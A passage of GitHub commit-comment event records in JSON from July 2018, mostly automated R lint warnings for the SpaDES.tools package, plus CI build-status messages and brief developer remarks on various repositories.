TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-05T21:50:52Z"}
{"id":"7925746828","type":"CommitCommentEvent","actor":{"login":"JamieRL"},"repo":{"name":"ubyssey/dispatch"},"payload":{"comment":{"id":29614152,"position":null,"line":null,"path":null,"commit_id":"81d932a7028fcf45703a028bd54ae32cfa9b9440","created_at":"2018-07-05T21:50:59Z","updated_at":"2018-07-05T21:50:59Z","author_association":"MEMBER","body":"This commit is misnamed and should be 0.4.16"}},"created_at":"2018-07-05T21:50:59Z"}
{"id":"7925747265","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29614153,"position":null,"line":null,"path":null,"commit_id":"6a7fb3f7bdc68b41126d3fd4431b743e24fe71cf","created_at":"2018-07-05T21:51:08Z","updated_at":"2018-07-05T21:51:08Z","author_association":"OWNER","body":"I think these bits of text could be back..."}},"created_at":"2018-07-05T21:51:08Z"}
{"id":"7925747888","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614154,"position":null,"line":null,"path":null,"commit_id":"adf6b247cac54b3d78dbca5d901e96db62e04972","created_at":"2018-07-05T21:51:18Z","updated_at":"2018-07-05T21:51:18Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-05T21:51:18Z"}
{"id":"7925753284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614164,"position":null,"line":null,"path":null,"commit_id":"adf6b247cac54b3d78dbca5d901e96db62e04972","created_at":"2018-07-05T21:52:43Z","updated_at":"2018-07-05T21:52:43Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T21:52:43Z"}
{"id":"7925753896","type":"CommitCommentEvent","actor":{"login":"boris900305"},"repo":{"name":"juanifioren/django-oidc-provider"},"payload":{"comment":{"id":29614165,"position":null,"line":null,"path":null,"commit_id":"d825061508b485310c601844b6ecbe47f7c9721d","created_at":"2018-07-05T21:52:53Z","updated_at":"2018-07-05T21:52:53Z","author_association":"NONE","body":"Ok, thanks for your time."}},"created_at":"2018-07-05T21:52:53Z"}
{"id":"7925756308","type":"CommitCommentEvent","actor":{"login":"colde"},"repo":{"name":"sQu4rks/crowsfoot"},"payload":{"comment":{"id":29614175,"position":5,"line":35,"path":"templates/base.html","commit_id":"1ce22f803c4a2d7601de2a10dc061ab1ce86663b","created_at":"2018-07-05T21:53:32Z","updated_at":"2018-07-05T21:53:32Z","author_association":"NONE","body":"I don't think this was intended. As it seems like it slightly restricts the theme"}},"created_at":"2018-07-05T21:53:32Z"}
{"id":"7925766112","type":"CommitCommentEvent","actor":{"login":"kittyhacker101"},"repo":{"name":"kittyhacker101/Tootgo"},"payload":{"comment":{"id":29614203,"position":null,"line":null,"path":null,"commit_id":"d0f8ff42c7221033c7eccd623b8cab4df4fc7161","created_at":"2018-07-05T21:56:17Z","updated_at":"2018-07-05T21:56:17Z","author_association":"OWNER","body":"I accidentally uploaded the wrong file to GitHub, so I had to fix things. Oops."}},"created_at":"2018-07-05T21:56:17Z"}
{"id":"7925768999","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29614209,"position":10,"line":12,"path":"contracts/FundsSplitter.sol","commit_id":"9a0568f89a567ca739917d3e8749017aa5b9dd79","created_at":"2018-07-05T21:57:09Z","updated_at":"2018-07-05T21:57:09Z","author_association":"NONE","body":"No need to set to `false`. This would cause an expensive SSTORE operation. Not needed because it reliably initializes to `0`. "}},"created_at":"2018-07-05T21:57:09Z"}
{"id":"7925769145","type":"CommitCommentEvent","actor":{"login":"MikaGuraN"},"repo":{"name":"HL4A/hl4a-core"},"payload":{"comment":{"id":29614210,"position":null,"line":null,"path":null,"commit_id":"34d2a990af25e0e28535be1dd4c48e7b5653a0d1","created_at":"2018-07-05T21:57:11Z","updated_at":"2018-07-05T21:57:11Z","author_association":"CONTRIBUTOR","body":"@nobodxbodon 没有呢，android没有的api还是有很多的"}},"created_at":"2018-07-05T21:57:11Z"}
{"id":"7925771018","type":"CommitCommentEvent","actor":{"login":"misfir3"},"repo":{"name":"WebGoat/WebGoat"},"payload":{"comment":{"id":29614215,"position":null,"line":null,"path":null,"commit_id":"84860e65f6c1f5d13ddc53b0f85129eb0b8459af","created_at":"2018-07-05T21:57:42Z","updated_at":"2018-07-05T21:57:42Z","author_association":"CONTRIBUTOR","body":"Question regarding this lesson @jselvi - But first, thanks for contributing it!\r\n... Do you have a handy sample payload, or description of how to generate one?  Playing some with ysoserial to try and generate one, but I'm not that strong on deserialization. Also, looking to improve hints on lessons.\r\ncc @nbaars "}},"created_at":"2018-07-05T21:57:42Z"}
{"id":"7925771920","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29614218,"position":14,"line":14,"path":"contracts/FundsSplitter.sol","commit_id":"9a0568f89a567ca739917d3e8749017aa5b9dd79","created_at":"2018-07-05T21:57:57Z","updated_at":"2018-07-05T21:57:57Z","author_association":"NONE","body":"I would make these two variables public so the users can easily inspect their balances. "}},"created_at":"2018-07-05T21:57:57Z"}
{"id":"7925772231","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29614219,"position":null,"line":null,"path":null,"commit_id":"4842e3cfc437989931f474a56a184dc02fa4293e","created_at":"2018-07-05T21:58:03Z","updated_at":"2018-07-05T21:58:03Z","author_association":"OWNER","body":"Created multidev environment [borked#ci-29](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#ci-29).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-29-borked.pantheonsite.io/)"}},"created_at":"2018-07-05T21:58:03Z"}
{"id":"7925773870","type":"CommitCommentEvent","actor":{"login":"TheLimeGlass"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29614225,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T21:58:26Z","updated_at":"2018-07-05T21:58:26Z","author_association":"CONTRIBUTOR","body":"It has an init method to control what expressions you use and the all of syntax is the same regardless"}},"created_at":"2018-07-05T21:58:26Z"}
{"id":"7925774796","type":"CommitCommentEvent","actor":{"login":"rbigueras"},"repo":{"name":"crate/crate"},"payload":{"comment":{"id":29614227,"position":4,"line":78,"path":"README.rst","commit_id":"9de91d81bdfea51de54cdff5ae5fe2265cd07fb9","created_at":"2018-07-05T21:58:40Z","updated_at":"2018-07-05T21:58:40Z","author_association":"NONE","body":"/"}},"created_at":"2018-07-05T21:58:40Z"}
{"id":"7925776526","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"easylist/easylistgermany"},"payload":{"comment":{"id":29614235,"position":null,"line":null,"path":null,"commit_id":"6f9747889f8caa385a8ef78e4992bc9ede6fa159","created_at":"2018-07-05T21:59:04Z","updated_at":"2018-07-05T21:59:04Z","author_association":"NONE","body":"bad one:\r\nhttps://forums.lanik.us/viewtopic.php?p=138502#p138502"}},"created_at":"2018-07-05T21:59:04Z"}
{"id":"7925777740","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29614239,"position":null,"line":null,"path":null,"commit_id":"73d3ecf574bea9d8d5a3082b10b278a9bd98e6a7","created_at":"2018-07-05T21:59:23Z","updated_at":"2018-07-05T21:59:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loonc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loonc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loonc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T21:59:23Z"}
{"id":"7925778323","type":"CommitCommentEvent","actor":{"login":"rbigueras"},"repo":{"name":"crate/crate"},"payload":{"comment":{"id":29614240,"position":4,"line":78,"path":"README.rst","commit_id":"9de91d81bdfea51de54cdff5ae5fe2265cd07fb9","created_at":"2018-07-05T21:59:33Z","updated_at":"2018-07-05T21:59:33Z","author_association":"NONE","body":"-.. _getting started: https://crate.io/docs/getting-started/"}},"created_at":"2018-07-05T21:59:33Z"}
{"id":"7925780708","type":"CommitCommentEvent","actor":{"login":"arskang"},"repo":{"name":"arskang/Udemy-heroes"},"payload":{"comment":{"id":29614249,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-05T22:00:11Z","updated_at":"2018-07-05T22:00:11Z","author_association":"OWNER","body":"# Joker\r\nEste es mi villano favorito."}},"created_at":"2018-07-05T22:00:11Z"}
{"id":"7925780761","type":"CommitCommentEvent","actor":{"login":"lacartaya"},"repo":{"name":"lacartaya/pagina-web"},"payload":{"comment":{"id":29614250,"position":null,"line":null,"path":null,"commit_id":"414771478420884ef5f40e54c0b070a0223d445f","created_at":"2018-07-05T22:00:12Z","updated_at":"2018-07-05T22:00:12Z","author_association":"OWNER","body":"menos mal que te diste cuenta que faltaba esa linea"}},"created_at":"2018-07-05T22:00:12Z"}
{"id":"7925784066","type":"CommitCommentEvent","actor":{"login":"Adrianpersonificado"},"repo":{"name":"sbosio/rla-es"},"payload":{"comment":{"id":29614267,"position":12,"line":5268,"path":"ortograf/palabras/RAE/Adjetivos.txt","commit_id":"eb89a3fb064b1ca54d9ef8a6883ad499e92457b0","created_at":"2018-07-05T22:00:54Z","updated_at":"2018-07-05T22:00:54Z","author_association":"NONE","body":"edificaciones hace lo mismo como en el pretil de la fuente principal de La Merced"}},"created_at":"2018-07-05T22:00:54Z"}
{"id":"7925785058","type":"CommitCommentEvent","actor":{"login":"flavio-fernandes"},"repo":{"name":"flavio-fernandes/softlayer-python"},"payload":{"comment":{"id":29614276,"position":null,"line":null,"path":null,"commit_id":"de7c255dd332e54bf41d610e3951f98d9b57a536","created_at":"2018-07-05T22:01:09Z","updated_at":"2018-07-05T22:01:09Z","author_association":"OWNER","body":"This is the proposed fix for bug: https://github.com/softlayer/softlayer-python/issues/996"}},"created_at":"2018-07-05T22:01:09Z"}
{"id":"7925785145","type":"CommitCommentEvent","actor":{"login":"arskang"},"repo":{"name":"arskang/Udemy-heroes"},"payload":{"comment":{"id":29614277,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-05T22:01:10Z","updated_at":"2018-07-05T22:01:10Z","author_association":"OWNER","body":"Entiendo porque agregaste a **Deadshot**."}},"created_at":"2018-07-05T22:01:10Z"}
{"id":"7925786318","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29614279,"position":null,"line":null,"path":null,"commit_id":"c02ae99a19f76daa9e95d5d372cd7f955c564c45","created_at":"2018-07-05T22:01:28Z","updated_at":"2018-07-05T22:01:28Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          